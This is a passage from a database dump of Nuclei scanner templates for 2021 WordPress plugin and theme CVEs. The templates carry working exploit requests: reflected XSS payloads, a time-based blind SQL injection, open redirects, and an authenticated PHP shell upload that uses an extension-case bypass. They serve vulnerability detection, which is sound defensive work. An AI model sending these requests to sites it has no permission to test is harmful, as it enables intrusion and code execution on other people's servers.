"id: CVE-2021-24320\n\ninfo:\n name: WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in its listing page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update WordPress Bello Directory & Listing Theme to version 1.6.0 or later to mitigate the vulnerability.\n reference:\n - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt\n - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24320\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24320\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.45256\n cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: bold-themes\n product: bello\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n - '{{BaseURL}}/wp-content/themes/bello/readme.txt'\n\n stop-at-first-match: true\n matchers:\n - type: word\n internal: true\n words:\n - 'wp-content/themes/bello/fonts'\n - 
'bold-themes.com/bello'\n condition: or\n\n - method: GET\n path:\n - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008e15f1d12a3c256545b2354d77805fba07dab4bd51e44c3fe7091d44faae1335022100a6fb26884ef13ceb3a1c3a2e828fd31823f1db0983fe693cbcfc5123cb4419ba:922c64590222798bb761d5b6d8e72950", "hash": "c92d21737cf86e049b960f4beaf6fba0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b0" }, "name": "CVE-2021-24335.yaml", "content": "id: CVE-2021-24335\n\ninfo:\n name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. 
It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability.\n reference:\n - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557\n - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt\n - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24335\n - https://m0ze.ru/vulnerability/%5B2021-02-12%5D-%5BWordPress%5D-%5BCWE-79%5D-Car-Repair-Services-WordPress-Theme-v3.9.txt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24335\n cwe-id: CWE-79\n epss-score: 0.00181\n epss-percentile: 0.54412\n cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\\&_auto_mechanic:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: smartdatasoft\n product: car_repair_services_\\&_auto_mechanic\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/car-repair-services/css'\n - '/wp-content/themes/car-repair-services/js'\n - 'id=\"car-repair-services-'\n condition: or\n\n - method: GET\n path:\n - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: 
status\n status:\n - 200\n# digest: 490a0046304402206ee5628010c7f23879f3e1a01c1890305b99db8d3cc1cb2718617cb2ef30780e02202b639a37a1dd866da6c94bfc1fe3d592d5ea367c2c3f2c31e551a20a425eaea9:922c64590222798bb761d5b6d8e72950", "hash": "9ef673263fdc916911515ca0f9c39871", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b1" }, "name": "CVE-2021-24340.yaml", "content": "id: CVE-2021-24340\n\ninfo:\n name: WordPress Statistics <13.0.8 - Blind SQL Injection\n author: lotusdll,j4vaovo\n severity: high\n description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.\n remediation: |\n Update to WordPress Statistics plugin version 13.0.8 or later to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49894\n - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/\n - https://github.com/Udyz/WP-Statistics-BlindSQL\n - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24340\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24340\n cwe-id: CWE-89\n epss-score: 0.01937\n epss-percentile: 0.88371\n cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: veronalabs\n product: wp_statistics\n framework: wordpress\n tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 15s\n GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 200'\n - 'contains(body_1, \"WP Statistics\")'\n condition: and\n\n - type: dsl\n dsl:\n - 
'duration_2>=7'\n - 'status_code_2 == 500'\n - 'contains(body_2, \">WordPress › Error<\") && contains(body_2, \">Your request is not valid.<\")'\n condition: and\n# digest: 4a0a004730450220183a03e620c9440c35b2d6073fdd8fd311debe078d409ad5ab0ed7b02f68cd81022100e1fdb85b5428e6dd55de5a162d0347cdc3c6ae247a909958c290934224079b62:922c64590222798bb761d5b6d8e72950", "hash": "27dc22bbf9d9334b4d45f6deb54794be", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b2" }, "name": "CVE-2021-24342.yaml", "content": "id: CVE-2021-24342\n\ninfo:\n name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24342\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24342\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: jnews\n product: jnews\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/themes/jnews/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: 
word\n internal: true\n words:\n - 'Change Log:'\n - 'JNews -'\n condition: and\n\n - raw:\n - |\n POST /?ajax-request=jnews HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n lang=en_US&cat_id=6\">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220698e69643ac31b2c0e4dc76eb0b904ce125dfe060203e3ab4768f00d20ef8f30022100a531cb557e30a01d688ad9803cada5532b7663e3bab4bccf9eb8d9f2c76e1b20:922c64590222798bb761d5b6d8e72950", "hash": "4bf784b5a7a2346507f3f1f62e27da54", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b3" }, "name": "CVE-2021-24347.yaml", "content": "id: CVE-2021-24347\n\ninfo:\n name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload\n author: theamanrawat\n severity: high\n description: |\n WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. 
PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.\n remediation: Fixed in version 4.22.\n reference:\n - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a\n - https://wordpress.org/plugins/sp-client-document-manager/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24347\n - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-24347\n cwe-id: CWE-178\n epss-score: 0.97036\n epss-percentile: 0.99699\n cpe: cpe:2.3:a:smartypantsplugins:sp_project_\\&_document_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: smartypantsplugins\n product: sp_project_\\&_document_manager\n framework: wordpress\n tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n {{nonce}}\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"_wp_http_referer\"\n\n /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n 
Content-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\n Content-Type: image/svg+xml\n\n \n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n Content-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\n Upload\n ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n - |\n GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(header_4, \"text/html\")\n - status_code_4 == 200\n - contains(body_4, \"CVE-2021-24347\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\"\n internal: true\n# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950", "hash": "d78a6ec98b7de4f380d3bc416f2265ab", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b4" }, "name": "CVE-2021-24351.yaml", "content": "id: CVE-2021-24351\n\ninfo:\n name: WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting\n author: Maximus Decimus\n severity: medium\n description: |\n WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016\n - https://theplusaddons.com/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24351\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/JoshMorrison99/my-nuceli-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24351\n cwe-id: CWE-79\n epss-score: 0.00154\n epss-percentile: 0.50743\n cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: posimyth\n product: the_plus_addons_for_elementor\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"the-plus-addons-for-elementor\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100b0eaf8ef2a2056147b9485f4d77a8844b65eac6cfb6216d78f3290313d7a3c0d0221008186ee4d441d90db81008c8d1396a431a4347efa93ae3069c01eab7a2b1ee18f:922c64590222798bb761d5b6d8e72950", "hash": "05fe9809d58cf4bca08ce5c7c47bf6f3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b5" }, "name": "CVE-2021-24358.yaml", "content": "id: CVE-2021-24358\n\ninfo:\n name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.\n impact: |\n This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities.\n remediation: |\n Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24358\n - https://theplusaddons.com/changelog/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24358\n cwe-id: CWE-601\n epss-score: 0.00329\n epss-percentile: 0.70388\n cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: posimyth\n product: the_plus_addons_for_elementor\n framework: wordpress\n tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth\n\nhttp:\n - raw:\n - |\n GET /?author=1 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n 
matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n extractors:\n - type: regex\n name: username\n group: 1\n regex:\n - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>'\n internal: true\n part: body\n\n - type: regex\n name: username\n group: 1\n regex:\n - 'ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/'\n internal: true\n part: header\n# digest: 4b0a00483046022100ae75d3fbb605efbbfe6ae9894ef9afa56a51b9d9be1cc299773a592741ef9fcf022100cd029992f746d9d353355c06400c8a7246c94a86df04621081ef99421a51cd76:922c64590222798bb761d5b6d8e72950", "hash": "393b669ed525216dfc06483b7b4ca181", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b6" }, "name": "CVE-2021-24364.yaml", "content": "id: CVE-2021-24364\n\ninfo:\n name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. 
It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24364\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/crpytoscooby/resourses_web\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24364\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tielabs\n product: jannah\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/jannah/assets/'\n - 'attachment-jannah-image-'\n condition: or\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402202b0c692d7f7fa8aecd2a0875cfbb10abcb21fd710aca2b36e29f1734b928142f022006cacf7134c58b067595e9ae0db5668660eae1fe56cdbc1df62c4b28f244bc25:922c64590222798bb761d5b6d8e72950", "hash": "b8a29d6fd081f02b6792490cc706e29f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b7" }, "name": "CVE-2021-24370.yaml", "content": "id: CVE-2021-24370\n\ninfo:\n name: WordPress Fancy Product Designer <4.6.9 - Arbitrary File Upload\n author: pikpikcu\n severity: critical\n description: |\n WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication.\n impact: |\n Attackers can upload malicious files and execute arbitrary code on the target system.\n remediation: |\n Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability.\n reference:\n - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/\n - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38\n - https://seclists.org/fulldisclosure/2020/Nov/30\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24370\n - https://www.secpod.com/blog/critical-zero-day-flaw-actively-exploited-in-wordpress-fancy-product-designer-plugin/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24370\n cwe-id: CWE-434\n epss-score: 0.11015\n epss-percentile: 0.95013\n cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: radykal\n product: fancy_product_designer\n framework: wordpress\n google-query: inurl:“/wp-content/plugins/fancy-product-designer”\n tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"error\":\"You need to define a directory'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c2a776e835f61bf3a78c76dd792d53c9c3bcfaf7974a24228b4f5e0a66ab0f2902210097e6ed969dab62237e84218f8f15915a107d24ce90adc20993b9d949a9e68aa4:922c64590222798bb761d5b6d8e72950", "hash": "8933d9a87dec6e3b5775823f14f9c3b2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b8" }, "name": "CVE-2021-24387.yaml", "content": "id: CVE-2021-24387\n\ninfo:\n name: WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting\n author: suman_kar\n severity: medium\n description: |\n WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update WordPress Pro Real Estate 7 Theme to version 3.1.1 or later to mitigate the vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2021070041\n - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745\n - https://contempothemes.com/wp-real-estate-7/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24387\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24387\n cwe-id: CWE-79\n epss-score: 0.00154\n epss-percentile: 0.50743\n cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: 
contempothemes\n product: real_estate_7\n framework: wordpress\n tags: cve,cve2021,xss,wordpress,wpscan,contempothemes\n\nhttp:\n - raw:\n - |\n GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '/wp-content/themes/realestate'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f6ed5d60c3d6fca4ea545a03f032d233384e4f202567758cc149f6ae9027fa0b0220774c944fc42cfeb9f74d77f0c613d54501ce5801e8b14c88c28ce9dc8bd6d38a:922c64590222798bb761d5b6d8e72950", "hash": "9a4a9bcb941cf91e3374d6d5e775e7da", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082b9" }, "name": "CVE-2021-24389.yaml", "content": "id: CVE-2021-24389\n\ninfo:\n name: WordPress FoodBakery <2.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. 
It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress FoodBakery plugin to version 2.2 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24389\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24389\n cwe-id: CWE-79\n epss-score: 0.00168\n epss-percentile: 0.526\n cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: chimpgroup\n product: foodbakery\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,chimpgroup\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b4a8c7559626a77bfa47ee663ee467fa30606c548c3616ff98aede7b7bd85964022100cf1e469fd9edd5275e71a159d792cbfe59e5a69410ac5cec9aa2b300e97c6e44:922c64590222798bb761d5b6d8e72950", "hash": "a1d6a607a8bc32243fcf42677dc4ce28", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ba" }, "name": "CVE-2021-24406.yaml", "content": "id: CVE-2021-24406\n\ninfo:\n name: WordPress wpForo Forum < 1.9.7 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: 
